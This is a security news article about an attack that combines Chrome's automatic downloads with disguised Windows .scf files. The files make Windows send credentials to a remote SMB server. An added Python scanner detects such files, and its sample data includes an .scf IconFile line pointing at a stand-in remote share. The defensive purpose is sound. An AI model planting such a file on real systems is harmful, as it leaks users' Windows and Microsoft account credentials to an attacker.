Google Chrome users on Windows should immediately disable automatic downloads in the browser to protect their authentication data from a newly discovered threat.
The Chrome browser is currently the most popular browser on desktop devices. It is set to automatically transfer safe files to the user's system without prompting beforehand.
Any file downloaded by Google Chrome users passes through Google's Safe Browsing controls and is then automatically transferred to the default download folder.
A new attack, detailed on the Defense Code website, combines Google Chrome's automatic download behavior with Windows Explorer shell script files that have the .scf file extension.
The malicious script comes in the form of plain text that includes instructions and a limited set of commands. What is interesting is that it can load resources from a remote server.
The biggest problem is that Windows processes these files as soon as you open the folder where they are stored, and that they appear without their extension in Windows Explorer regardless of the settings. This means that attackers could easily hide the file behind a disguised file name, such as one that appears to end in .jpg.
Attackers use an SMB server location for the icon. What happens next is that the server requests authentication and the system provides it. The researchers note that cracking the passwords is now child's play, unless the password is of a complex type.
The situation is even worse for Windows 8 or 10 users who authenticate with a Microsoft account, as the account will give the attacker access to online services such as Outlook, OneDrive, or Office 365 if the user uses them. There is also the possibility that the password has been reused on sites that are not owned by Microsoft.
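A defender can check a download folder for the files described above: .scf files whose displayed name hides the extension and whose contents point at a remote server. The Python sketch below is an added example, not code from the article or from the researchers. It assumes .scf files use an INI-style key=value layout (for example an IconFile key), which the page does not spell out, and all sample content is constructed.

```python
import re
import tempfile
from pathlib import Path

# Assumed layout (not given on the page): .scf files are INI-style "key=value" text.
# Matches any value that is a UNC path (\\host\... or //host/...) and captures the host.
UNC_VALUE = re.compile(
    r"^[ \t]*([^=\[\];\r\n]+?)[ \t]*=[ \t]*(?:\\\\|//)([^\\/\s]+)", re.MULTILINE)

def decode(raw: bytes) -> str:
    """Decode file bytes, honouring a UTF-16 byte-order mark if present."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("latin-1")

def remote_references(text: str) -> list:
    """Return (key, host) for every value that points at a remote UNC path."""
    return [(m.group(1), m.group(2)) for m in UNC_VALUE.finditer(text)]

def scan_folder(folder) -> list:
    """Report every .scf file in a folder, with the name Explorer would display."""
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        refs = remote_references(decode(path.read_bytes()[:65536]))
        findings.append({
            "file": path.name,
            "shown_as": path.stem,  # Explorer hides the .scf extension
            "remote_hosts": sorted({host for _, host in refs}),
        })
    return findings

# Constructed sample content; 192.0.2.10 is a documentation-only address.
SAMPLE_REMOTE = "[Shell]\r\nCommand=2\r\n" + r"IconFile=\\192.0.2.10\share\icon.ico" + "\r\n"
SAMPLE_LOCAL = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"

def demo() -> list:
    """Build a throwaway folder with constructed files and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "holiday.jpg.scf").write_bytes(SAMPLE_REMOTE.encode("ascii"))
        Path(tmp, "desktop.scf").write_bytes(SAMPLE_LOCAL.encode("utf-16"))
        Path(tmp, "notes.txt").write_text("not an scf file")
        return scan_folder(tmp)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Any .scf file in a download folder deserves a look; a non-empty `remote_hosts` list means that opening the folder would make Windows contact that host.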